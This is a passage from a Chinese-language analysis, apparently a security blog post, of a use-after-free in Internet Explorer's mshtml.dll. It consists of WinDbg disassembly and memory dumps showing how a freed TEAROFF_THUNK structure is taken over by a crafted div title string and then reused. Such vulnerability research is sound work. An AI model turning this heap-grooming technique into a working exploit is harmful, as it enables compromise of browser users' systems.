\u5f53\u6307\u5411onpropertychange=null;\u65f6\u5f15\u7528\u8ba1\u6570\u53d8\u4e3a0\uff0c\u56e0\u6b64\u8981\u91ca\u653e\u63a5\u53e3\u6307\u9488\uff0c\u800c\u8be5\u63a5\u53e3\u6307\u9488\u53c8\u6307\u5411attributes\u63a5\u53e3\u7684\u6307\u9488\uff0c\u56e0\u6b64\u4e5f\u8981\u91ca\u653eattributes\u63a5\u53e3\u7684\u6307\u9488\uff0c\u8fd4\u56de\u540e\u4f1a\u5148\u91ca\u653e\u5230TEAROFF_THUNK\u7f13\u5b58\u4e2d\uff0c\u5982\u679c\u5927\u4e8e\u4e24\u4e2a\uff0c\u5219\u4f1a\u5b9e\u9645\u91ca\u653e\u5185\u5b58\u3002<\/code><\/div>\n
<\/div>\n
mshtml!PlainRelease:<\/code><\/div>\n
<\/div>\n
6a7578d5 8bff\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi,edi<\/code><\/div>\n
<\/div>\n
6a7578d7 55\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 ebp<\/code><\/div>\n
<\/div>\n
6a7578d8 8bec\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ebp,esp<\/code><\/div>\n
<\/div>\n
6a7578da 56\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0push\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
<\/div>\n
6a7578db 8b7508\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 esi,dword ptr [ebp+8]<\/code><\/div>\n
<\/div>\n
6a7578de ff4e04\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 dec\u00a0\u00a0\u00a0\u00a0 dword ptr [esi+4]<\/code><\/div>\n
<\/div>\n
6a7578e1 8b4604\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 eax,dword ptr [esi+4] ds:0023:0066c834=00000000<\/code><\/div>\n
<\/div>\n
6a7578e4 749a\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 je\u00a0\u00a0\u00a0\u00a0\u00a0 mshtml!PlainRelease+0x11 (6a757880)<\/code><\/div>\n
<\/div>\n
6a7578e6 5e\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 pop\u00a0\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
<\/div>\n
6a7578e7 5d\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 pop\u00a0\u00a0\u00a0\u00a0 ebp<\/code><\/div>\n
<\/div>\n
6a7578e8 c20400\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ret\u00a0\u00a0\u00a0\u00a0 4<\/code><\/div>\n
<\/div>\n
6a757883 85c0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 test\u00a0\u00a0\u00a0 eax,eax<\/code><\/div>\n
<\/div>\n
6a757885 740d\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 je\u00a0\u00a0\u00a0\u00a0\u00a0 mshtml!PlainRelease+0x25 (6a757894)<\/code><\/div>\n
<\/div>\n
6a757887 f6461c04\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 test\u00a0\u00a0\u00a0 byte ptr [esi+1Ch],4<\/code><\/div>\n
<\/div>\n
6a75788b 7507\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jne\u00a0\u00a0\u00a0\u00a0 mshtml!PlainRelease+0x25 (6a757894)<\/code><\/div>\n
<\/div>\n
6a75788d 8b4e10\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx,dword ptr [esi+10h]<\/code><\/div>\n
<\/div>\n
6a757890 50\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 eax<\/code><\/div>\n
<\/div>\n
6a757891 ff5108\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 dword ptr [ecx+8]<\/code><\/div>\n
<\/div>\n
6a757894 8b4614\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 eax,dword ptr [esi+14h]<\/code><\/div>\n
<\/div>\n
6a757897 85c0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 test\u00a0\u00a0\u00a0 eax,eax<\/code><\/div>\n
<\/div>\n
6a757899 0f853d870000\u00a0\u00a0\u00a0 jne\u00a0\u00a0\u00a0\u00a0 mshtml!PlainRelease+0x2c (6a75ffdc)<\/code><\/div>\n
<\/div>\n
6a75789f 56\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
<\/div>\n
6a7578a0 8b3560125a6a\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 esi,dword ptr [mshtml!_imp__InterlockedExchange (6a5a1260)]<\/code><\/div>\n
<\/div>\n
6a7578a6 683cb0ad6a\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 offset mshtml!g_pTimerMan+0x8 (6aadb03c)<\/code><\/div>\n
<\/div>\n
6a7578ab ffd6\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
<\/div>\n
6a7578ad 85c0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 test\u00a0\u00a0\u00a0 eax,eax<\/code><\/div>\n
<\/div>\n
6a7578af 741b\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 je\u00a0\u00a0\u00a0\u00a0\u00a0 mshtml!PlainRelease+0x60 (6a7578cc)<\/code><\/div>\n
<\/div>\n
6a7578b1 50\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 eax<\/code><\/div>\n
<\/div>\n
6a7578b2 6840b0ad6a\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 offset mshtml!g_pTimerMan+0xc (6aadb040)<\/code><\/div>\n
<\/div>\n
6a7578b7 ffd6\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
<\/div>\n
6a7578b9 85c0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 test\u00a0\u00a0\u00a0 eax,eax<\/code><\/div>\n
<\/div>\n
6a7578bb 740f\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 je\u00a0\u00a0\u00a0\u00a0\u00a0 mshtml!PlainRelease+0x60 (6a7578cc)<\/code><\/div>\n
<\/div>\n
6a7578bd 50\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 eax<\/code><\/div>\n
<\/div>\n
6a7578be 6a00\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 0<\/code><\/div>\n
<\/div>\n
6a7578c0 ff351884ad6a\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 dword ptr [mshtml!g_hProcessHeap (6aad8418)]<\/code><\/div>\n
<\/div>\n
6a7578c6 ff15fc125a6a\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 dword ptr [mshtml!_imp__HeapFree (6a5a12fc)]<\/code><\/div>\n
<\/div>\n
6a7578cc 33c0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0xor\u00a0\u00a0\u00a0\u00a0 eax,eax<\/code><\/div>\n
<\/div>\n
6a7578ce eb16\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jmp\u00a0\u00a0\u00a0\u00a0 mshtml!PlainRelease+0x62 (6a7578e6)<\/code><\/div>\n
<\/div>\n
attributes\u5c5e\u6027\u5bf9\u8c61\u7684\u6790\u6784\u51fd\u6570\u4f1a\u5148\u5230\u5c5e\u6027\u6570\u7ec4\u4e2d\u5220\u9664attributes\u5c5e\u6027\uff0c\u7531\u4e8eattributes\u5c5e\u6027\u5728onpropertychange\u5c5e\u6027\u524d\u9762\uff0c\u4f1a\u5bfc\u81f4onpropertychange\u5c5e\u6027\u5728\u5c5e\u6027\u6570\u7ec4\u4e2d\u7684\u7d22\u5f15\u524d\u79fb\u3002<\/code><\/div>\n
<\/div>\n
mshtml!CAttrCollectionator::~CAttrCollectionator:<\/code><\/div>\n
<\/div>\n
6a5e8b19 8bff\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi,edi<\/code><\/div>\n
<\/div>\n
6a5e8b1b 56\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
<\/div>\n
6a5e8b1c 6a03\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 3<\/code><\/div>\n
<\/div>\n
6a5e8b1e 8bf1\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 esi,ecx<\/code><\/div>\n
<\/div>\n
6a5e8b20 685a140180\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 8001145Ah<\/code><\/div>\n
<\/div>\n
6a5e8b25 ff7614\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 dword ptr [esi+14h]<\/code><\/div>\n
<\/div>\n
6a5e8b28 c706c83c756a\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 dword ptr [esi],offset mshtml!CAttrCollectionator::`vftable' (6a753cc8)<\/code><\/div>\n
<\/div>\n
6a5e8b2e e80db61500\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 mshtml!CBase::DidFindAAIndexAndDelete (6a744140)<\/code><\/div>\n
<\/div>\n
6a5e8b33 8b4614\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 eax,dword ptr [esi+14h]<\/code><\/div>\n
<\/div>\n
6a5e8b36 8b08\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0mov\u00a0\u00a0\u00a0\u00a0 ecx,dword ptr [eax]<\/code><\/div>\n
<\/div>\n
6a5e8b38 50\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 eax<\/code><\/div>\n
<\/div>\n
6a5e8b39 ff91e0000000\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 dword ptr [ecx+0E0h]<\/code><\/div>\n
<\/div>\n
6a5e8b3f 8d461c\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 lea\u00a0\u00a0\u00a0\u00a0 eax,[esi+1Ch]<\/code><\/div>\n
<\/div>\n
6a5e8b42 e8dfef1600\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 mshtml!CImplAry::~CImplAry (6a757b26)<\/code><\/div>\n
<\/div>\n
6a5e8b47 8bce\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx,esi<\/code><\/div>\n
<\/div>\n
6a5e8b49 5e\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 pop\u00a0\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
<\/div>\n
6a5e8b4a e9f18f1700\u00a0\u00a0\u00a0\u00a0\u00a0 jmp\u00a0\u00a0\u00a0\u00a0 mshtml!CBase::~CBase (6a761b40)<\/code><\/div>\n
<\/div>\n
\u8fd4\u56de\u540eonpropertychange\u5c5e\u6027\u6307\u5411\u7684TEAROFF_THUNK\u7ed3\u6784\u91ca\u653e\u5230\u7f13\u5b58\u4e2d\uff0c\u5c5e\u6027\u6570\u7ec4\u4e2d<\/code><\/div>\n
<\/div>\n
attributes\u5c5e\u6027\u88ab\u5220\u9664\u3002<\/code><\/div>\n
<\/div>\n
0:005> dd 6aadb03c l2<\/code><\/div>\n
<\/div>\n
6aadb03c\u00a0 0066c830 0066c780<\/code><\/div>\n
<\/div>\n
0:005> dd 005fba58<\/code><\/div>\n
<\/div>\n
005fba58\u00a0 00200903 8001179f 00000000 0066c830<\/code><\/div>\n
<\/div>\n
005fba68\u00a0 00000d08 800117c4 00000000 00661180<\/code><\/div>\n
<\/div>\n
\u5f53\u8fd4\u56de\u540e\u51c6\u5907\u4ece\u5c5e\u6027\u6570\u7ec4\u4e2d\u5220\u9664onpropertychange\u5c5e\u6027\u65f6\u7531\u4e8e\u7d22\u5f15\u524d\u79fb\uff0c\u5bfc\u81f4\u65e0\u6cd5\u5220\u9664\u3002<\/code><\/div>\n
<\/div>\n
mshtml!CImplAry::Delete:<\/code><\/div>\n
<\/div>\n
6a757ad5 8bff\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi,edi<\/code><\/div>\n
<\/div>\n
6a757ad7 56\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
<\/div>\n
6a757ad8 8bf0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 esi,eax<\/code><\/div>\n
<\/div>\n
6a757ada 85ff\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 test\u00a0\u00a0\u00a0 edi,edi<\/code><\/div>\n
<\/div>\n
6a757adc 7c28\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jl\u00a0\u00a0\u00a0\u00a0\u00a0 mshtml!CImplAry::Delete+0x51 (6a757b06)<\/code><\/div>\n
<\/div>\n
6a757ade 8b4a04\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx,dword ptr [edx+4]<\/code><\/div>\n
<\/div>\n
6a757ae1 8bc1\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 eax,ecx<\/code><\/div>\n
<\/div>\n
6a757ae3 c1e802\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 shr\u00a0\u00a0\u00a0\u00a0 eax,2<\/code><\/div>\n
<\/div>\n
6a757ae6 3bf8\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmp\u00a0\u00a0\u00a0\u00a0 edi,eax<\/code><\/div>\n
<\/div>\n
6a757ae8 7d1c\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jge\u00a0\u00a0\u00a0\u00a0 mshtml!CImplAry::Delete+0x51 (6a757b06)<\/code><\/div>\n
<\/div>\n
6a757aea 83e103\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 and\u00a0\u00a0\u00a0\u00a0 ecx,3<\/code><\/div>\n
<\/div>\n
6a757aed 8d0485fcffffff\u00a0 lea\u00a0\u00a0\u00a0\u00a0 eax,[eax*4-4]<\/code><\/div>\n
<\/div>\n
6a757af4 0bc1\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0or\u00a0\u00a0\u00a0\u00a0\u00a0 eax,ecx<\/code><\/div>\n
<\/div>\n
6a757af6 8bc8\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx,eax<\/code><\/div>\n
<\/div>\n
6a757af8 c1e902\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 shr\u00a0\u00a0\u00a0\u00a0 ecx,2<\/code><\/div>\n
<\/div>\n
6a757afb 894204\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 dword ptr [edx+4],eax<\/code><\/div>\n
<\/div>\n
6a757afe 3bf9\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmp\u00a0\u00a0\u00a0\u00a0 edi,ecx<\/code><\/div>\n
<\/div>\n
6a757b00 0f8268770600\u00a0\u00a0\u00a0 jb\u00a0\u00a0\u00a0\u00a0\u00a0 mshtml!CImplAry::Delete+0x2d (6a7bf26e) [br=0]<\/code><\/div>\n
<\/div>\n
6a757b06 5e\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 pop\u00a0\u00a0\u00a0\u00a0 esi<\/code><\/div>\n
<\/div>\n
6a757b07 c3\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ret<\/code><\/div>\n
<\/div>\n
\u5f53\u6267\u884c\u5230\u7f13\u5b58\u7684\u4e24\u4e2a\u7ed3\u6784\u4f53\u6307\u9488\u90fd\u6307\u5411\u539f\u6765onpropertychange\u6307\u5411\u7684\u7ed3\u6784\u65f6\uff0c\u5982\u679c\u518d\u91ca\u653e\u4e00\u4e2aTEAROFF_THUNK\u7ed3\u6784\u4f53\uff0c\u5219\u4f1a\u5bfc\u81f4onpropertychange\u6307\u5411\u7684\u7ed3\u6784\u5185\u5b58\u91ca\u653e\uff0c\u4f46\u540c\u65f6\u53c8\u4fdd\u7559\u5728\u7ed3\u6784\u4f53\u7f13\u5b58\u4e2d\uff0c\u4e0b\u9762\u4e3adiv\u7684title\u5c5e\u6027\u8d4b\u503c\u65f6\u7531\u4e8e\u5b57\u7b26\u4e32\u7684\u957f\u5ea6\u4e0e\u7ed3\u6784\u4f53\u7684\u5927\u5c0f\u76f8\u540c\uff0c\u56e0\u6b64\u4f1a\u6b63\u597d\u5360\u4f4d\u521a\u91ca\u653e\u7684\u5185\u5b58\u3002<\/code><\/div>\n
<\/div>\n
0:005> dd 6aadb03c l2<\/code><\/div>\n
<\/div>\n
6aadb03c\u00a0 0066c830 0066c830<\/code><\/div>\n
<\/div>\n
0:005> p<\/code><\/div>\n
<\/div>\n
eax=0066c830 ebx=001aba30 ecx=6aadb040 edx=0066c830 esi=76a9bf0a edi=00000001<\/code><\/div>\n
<\/div>\n
eip=6a7578bd esp=020ca1c0 ebp=020ca1c4 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl nz na pe nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000206<\/code><\/div>\n
<\/div>\n
mshtml!PlainRelease+0x51:<\/code><\/div>\n
<\/div>\n
6a7578bd 50\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 eax<\/code><\/div>\n
<\/div>\n
0:005> p<\/code><\/div>\n
<\/div>\n
eax=0066c830 ebx=001aba30 ecx=6aadb040 edx=0066c830 esi=76a9bf0a edi=00000001<\/code><\/div>\n
<\/div>\n
eip=6a7578be esp=020ca1bc ebp=020ca1c4 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl nz na pe nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000206<\/code><\/div>\n
<\/div>\n
mshtml!PlainRelease+0x52:<\/code><\/div>\n
<\/div>\n
6a7578be 6a00\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 0<\/code><\/div>\n
<\/div>\n
0:005> p<\/code><\/div>\n
<\/div>\n
eax=0066c830 ebx=001aba30 ecx=6aadb040 edx=0066c830 esi=76a9bf0a edi=00000001<\/code><\/div>\n
<\/div>\n
eip=6a7578c0 esp=020ca1b8 ebp=020ca1c4 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl nz na pe nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000206<\/code><\/div>\n
<\/div>\n
mshtml!PlainRelease+0x54:<\/code><\/div>\n
<\/div>\n
6a7578c0 ff351884ad6a\u00a0\u00a0\u00a0 push\u00a0\u00a0\u00a0 dword ptr [mshtml!g_hProcessHeap (6aad8418)] ds:0023:6aad8418=005a0000<\/code><\/div>\n
<\/div>\n
0:005> p<\/code><\/div>\n
<\/div>\n
eax=0066c830 ebx=001aba30 ecx=6aadb040 edx=0066c830 esi=76a9bf0a edi=00000001<\/code><\/div>\n
<\/div>\n
eip=6a7578c6 esp=020ca1b4 ebp=020ca1c4 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl nz na pe nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000206<\/code><\/div>\n
<\/div>\n
mshtml!PlainRelease+0x5a:<\/code><\/div>\n
<\/div>\n
6a7578c6 ff15fc125a6a\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 dword ptr [mshtml!_imp__HeapFree (6a5a12fc)] ds:0023:6a5a12fc={kernel32!HeapFree (76a9bbd0)}<\/code><\/div>\n
<\/div>\n
0:005> dd 6aadb03c l2<\/code><\/div>\n
<\/div>\n
6aadb03c\u00a0 0062ae30 0066c830<\/code><\/div>\n
<\/div>\n
\u5982\u4e0b\u91ca\u653e\u7684\u5185\u5b58\u6b63\u597d\u88abvtable1\u7684\u5b57\u7b26\u4e32\u5360\u4f4d\u3002<\/code><\/div>\n
<\/div>\n
0175b738\u00a0 \"title\"<\/code><\/div>\n
<\/div>\n
Breakpoint 3 hit<\/code><\/div>\n
<\/div>\n
eax=0062ae30 ebx=00000000 ecx=6aadb03c edx=00000000 esi=6a768eb0 edi=76a9bf0a<\/code><\/div>\n
<\/div>\n
eip=76a9bb46 esp=020c9edc ebp=020c9ef4 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl zr na pe nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000246<\/code><\/div>\n
<\/div>\n
kernel32!InterlockedExchange+0xe:<\/code><\/div>\n
<\/div>\n
76a9bb46 75fa\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 jne\u00a0\u00a0\u00a0\u00a0 kernel32!InterlockedExchange+0xa (76a9bb42) [br=0]<\/code><\/div>\n
<\/div>\n
0:005> g<\/code><\/div>\n
<\/div>\n
Breakpoint 1 hit<\/code><\/div>\n
<\/div>\n
eax=00647364 ebx=0064733c ecx=00000008 edx=00000000 esi=00647344 edi=0066c838<\/code><\/div>\n
<\/div>\n
eip=77409b60 esp=020c9e24 ebp=020c9e2c iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl nz na po nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00010202<\/code><\/div>\n
<\/div>\n
msvcrt!memcpy+0x5a:<\/code><\/div>\n
<\/div>\n
77409b60 f3a5\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 rep movs dword ptr es:[edi],dword ptr [esi]<\/code><\/div>\n
<\/div>\n
0:005> du esi<\/code><\/div>\n
<\/div>\n
00647344\u00a0 \"111110000000000\"<\/code><\/div>\n
<\/div>\n
\u5f53\u6267\u884cstyle.color=\u201dred\u201d\uff1b\u8bed\u53e5\u65f6\u518d\u6b21\u4eceTEAROFF_THUNK\u7f13\u5b58\u4e2d\u5206\u914d\u88ab\u5b57\u7b26\u4e32\u5360\u4f4d\u7684\u7ed3\u6784\u4f53\u3002<\/code><\/div>\n
<\/div>\n
0175b738\u00a0 \"title\"<\/code><\/div>\n
<\/div>\n
0175b738\u00a0 \"title\"<\/code><\/div>\n
<\/div>\n
0175b738\u00a0 \"title\"<\/code><\/div>\n
<\/div>\n
0175b770\u00a0 \"style\"<\/code><\/div>\n
<\/div>\n
Breakpoint 1 hit<\/code><\/div>\n
<\/div>\n
eax=00000000 ebx=00000000 ecx=6aadb040 edx=00000000 esi=0066c830 edi=76a9bf0a<\/code><\/div>\n
<\/div>\n
eip=6a75a52d esp=020c8a88 ebp=020c8a94 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl zr na pe nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000246<\/code><\/div>\n
<\/div>\n
mshtml!CreateTearOffThunk+0x69:<\/code><\/div>\n
<\/div>\n
6a75a52d 8b4d08\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 ecx,dword ptr [ebp+8] ss:0023:020c8a9c=005f4178<\/code><\/div>\n
<\/div>\n
0:005> dd esi<\/code><\/div>\n
<\/div>\n
0066c830\u00a0 00310031 00000000 00310031 00310031<\/code><\/div>\n
<\/div>\n
0066c840\u00a0 00300031 00300030 00300030 00300030<\/code><\/div>\n
<\/div>\n
0066c850\u00a0 00300030 00000030 2d117bc2 88000000<\/code><\/div>\n
<\/div>\n
0066c860\u00a0 6aadbdc8 00000001 6a775d74 00628600<\/code><\/div>\n
<\/div>\n
0066c870\u00a0 6a5e77d0 00000000 00000000 00000000<\/code><\/div>\n
<\/div>\n
0066c880\u00a0 03000047 00000000 2d117bd8 8c000000<\/code><\/div>\n
<\/div>\n
0066c890\u00a0 71d8436c 71d3a4dc 71d8c020 00010001<\/code><\/div>\n
<\/div>\n
0066c8a0\u00a0 00000000 71d4b540 00664058 00000000<\/code><\/div>\n
<\/div>\n
0:005> g<\/code><\/div>\n
